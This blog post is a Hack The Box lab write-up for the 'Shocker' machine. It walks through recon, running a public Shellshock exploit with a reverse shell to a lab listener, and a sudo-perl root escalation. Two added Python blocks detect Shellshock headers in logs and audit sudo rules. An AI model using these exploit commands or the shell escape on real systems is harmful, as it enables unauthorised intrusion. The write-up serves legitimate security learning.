Penguin Tech blog

I plan to post CTF writeups and the like here.

Hack The Box Writeup Shocker

■Preparation
Log in to the Hack The Box site
Download the .ovpn file from the Hack The Box site beforehand


Connect over the VPN
$ sudo openvpn lab_xxxxx.ovpn
(snip)
2021-07-16 22:01:20 Preserving previous TUN/TAP instance: tun0
2021-07-16 22:01:20 Initialization Sequence Completed
If it stops at "Initialization Sequence Completed", you're good.

If the VPN is unstable (keeps disconnecting and retrying the connection, etc.), it's better to choose a server in a different country
(this can be selected in the browser before downloading the config).

Open another terminal and run the following commands there.


■Challenge
Shocker
https://app.hackthebox.eu/machines/Shocker

Reference
https://qiita.com/yukitsukai47/items/37de18a81b138d93373a

(I'm a beginner, so I'm pretty much copying it as-is)


■Recon
$ nmap -sV -sT -sC 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 08:18 EDT
Nmap scan report for 10.10.10.56
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 *1
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.91 seconds


Try accessing it in a browser


No particular hints.


Prepare the wordlist for the directory scanner
$ locate directory-list-2.3-medium.txt
/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt


Its contents look like this

$ tail -n 10 /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
t15499
t15498
t15507
nt4lgscr
t15511
ntsrvtls
t15510
ntservpk
t1551
nt4stopc


Scan with the directory scanner

(-t 25 is the number of threads to use for the scan)
$ gobuster dir -t 25 -u http://10.10.10.56 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuser_output.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/17 08:22:05 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 299]
Nothing obvious (aborted)


■Try a different scanner
$ dirb http://10.10.10.56

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jul 17 08:30:59 2021
URL_BASE: http://10.10.10.56/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.56/ ----
+ http://10.10.10.56/cgi-bin/ (CODE:403|SIZE:294)
+ http://10.10.10.56/index.html (CODE:200|SIZE:137)


■Scan under the cgi-bin found above (sh, cgi, pl)
$ gobuster dir -t 25 -u http://10.10.10.56/cgi-bin/ -x sh,cgi,pl -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuser_output.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.56/cgi-bin/
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: pl,sh,cgi
[+] Timeout: 10s
===============================================================
2021/07/17 08:36:13 Starting gobuster in directory enumeration mode
===============================================================
/user.sh (Status: 200) [Size: 118]


■Take a look at user.sh
$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

08:36:58 up 7:42, 0 users, load average: 0.00, 0.02, 0.00


Given the box name, I suspect a Shellshock vulnerability.

Search for the vulnerability

$ searchsploit shell shock
------------------------------------------------------------------------------------ -------------------
Exploit Title | Path
------------------------------------------------------------------------------------ -------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasp | cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection | linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection | linux/remote/34766.php


$ locate 34900.py
/usr/share/exploitdb/exploits/linux/remote/34900.py


$ cp -p /usr/share/exploitdb/exploits/linux/remote/34900.py .


Try running the PoC

$ python ./34900.py payload=bind rhost=10.10.10.56 rport=80
[-] Trying exploit on : /cgi-sys/entropysearch.cgi
[*] 404 on : /cgi-sys/entropysearch.cgi
[!] Successfully exploited
[!] Connected to 10.10.10.56
Something's off (no RCE)

Try changing the arguments
$ python ./34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.9 lport=1234

[!] Started reverse shell handler
[-] Trying exploit on : /cgi-sys/entropysearch.cgi
[*] 404 on : /cgi-sys/entropysearch.cgi
[-] Trying exploit on : /cgi-sys/defaultwebpage.cgi
[*] 404 on : /cgi-sys/defaultwebpage.cgi
[-] Trying exploit on : /cgi-mod/index.cgi
[*] 404 on : /cgi-mod/index.cgi
[-] Trying exploit on : /cgi-bin/test.cgi
[*] 404 on : /cgi-bin/test.cgi
[-] Trying exploit on : /cgi-bin-sdb/printenv
[*] 404 on : /cgi-bin-sdb/printenv
It stops partway through


Apparently you need to specify pages
$ python ./34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.16.9 lport=1234 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)

10.10.10.56> ls
user.sh

10.10.10.56> cat /home/shelly/user.txt
→ For some reason, submitting the flag that came out returns "incorrect flag" and it isn't accepted.

No points for it, but oh well...
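The Shellshock path used above arrives as a bash function definition smuggled into a request header that mod_cgi exports into the script's environment. As an added defender's-side example (not part of the original writeup), the Python below parses Apache combined-format access log lines and flags requests whose User-Agent or Referer carries that signature; the log format and the sample lines are assumptions, and the sample lines are constructed, not captured from the box.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" access-log format (assumed here):
#   ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A Shellshock attempt smuggles a bash function definition into a header that
# mod_cgi exports into the script's environment; the tell-tale prefix is "() {".
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per request carrying the Shellshock signature in a CGI-exported header."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("ua", "referer"):          # HTTP_USER_AGENT / HTTP_REFERER
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({"ip": rec["ip"], "path": rec["path"],
                             "status": rec["status"], "field": field})
                break
    return hits

# Constructed sample lines: two normal requests to the uptime script and one
# request whose User-Agent carries a harmless test signature.
SAMPLE_LOG = [
    '10.10.16.20 - - [17/Jul/2021:08:36:58 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"',
    '10.10.16.20 - - [17/Jul/2021:08:37:02 -0400] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.16.9 - - [17/Jul/2021:08:40:11 -0400] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo shellshock-test"',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} via {hit['field']} (HTTP {hit['status']})")
```

Because the signature is matched on the header value rather than on the path, the check also catches attempts against CGI scripts other than the one enumerated here.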


Check whether sudo can be used

10.10.10.56> sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl


Perl can be run via sudo without a password, so launch a shell from Perl
10.10.10.56> sudo perl -e 'exec("/bin/bash")'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)

Commands can now be executed as root


The following site summarizes, per command, methods that help in getting root
https://gtfobins.github.io/
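The `sudo -l` rule above is the whole privilege-escalation story: a NOPASSWD grant to an interpreter is a root shell. As an added example that is not part of the original post, the Python below audits `sudo -l` output and flags rules that grant a shell-capable program without a password, or an unrestricted ALL; the list of shell-capable binaries is an assumed, representative subset of what GTFOBins catalogs, and the sample output is constructed from the rule shown on the box plus one harmless rule.

```python
import re
from typing import Dict, List

# Assumed, representative list of binaries that can spawn a shell when run as root
# (the category GTFOBins catalogs); a NOPASSWD grant to any of them is root-equivalent.
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "php", "lua", "node", "bash", "sh",
                 "vi", "vim", "nano", "less", "more", "find", "awk", "env", "man", "nmap"}

USER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on (?P<host>\S+):$")
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(output: str) -> List[Dict[str, str]]:
    """Parse `sudo -l` output and return the rules that amount to a root shell."""
    findings: List[Dict[str, str]] = []
    user = host = None
    for raw in output.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            user, host = m.group("user"), m.group("host")
            continue
        if user is None:                 # still inside the "Matching Defaults entries" preamble
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}   # NOPASSWD, SETENV, ...
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "any command"
            elif "NOPASSWD" in tags and binary in SHELL_CAPABLE:
                reason = f"{binary} can spawn a shell without a password prompt"
            else:
                continue
            findings.append({"user": user, "host": host, "runas": m.group("runas"),
                             "command": cmd, "reason": reason})
    return findings

# Constructed sample: the rule from the box plus one password-protected, non-shell rule.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{f['user']}@{f['host']}: ({f['runas']}) {f['command']} -> {f['reason']}")
```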


10.10.10.56> cat /root/root.txt
Got "incorrect flag" and it wasn't accepted, but done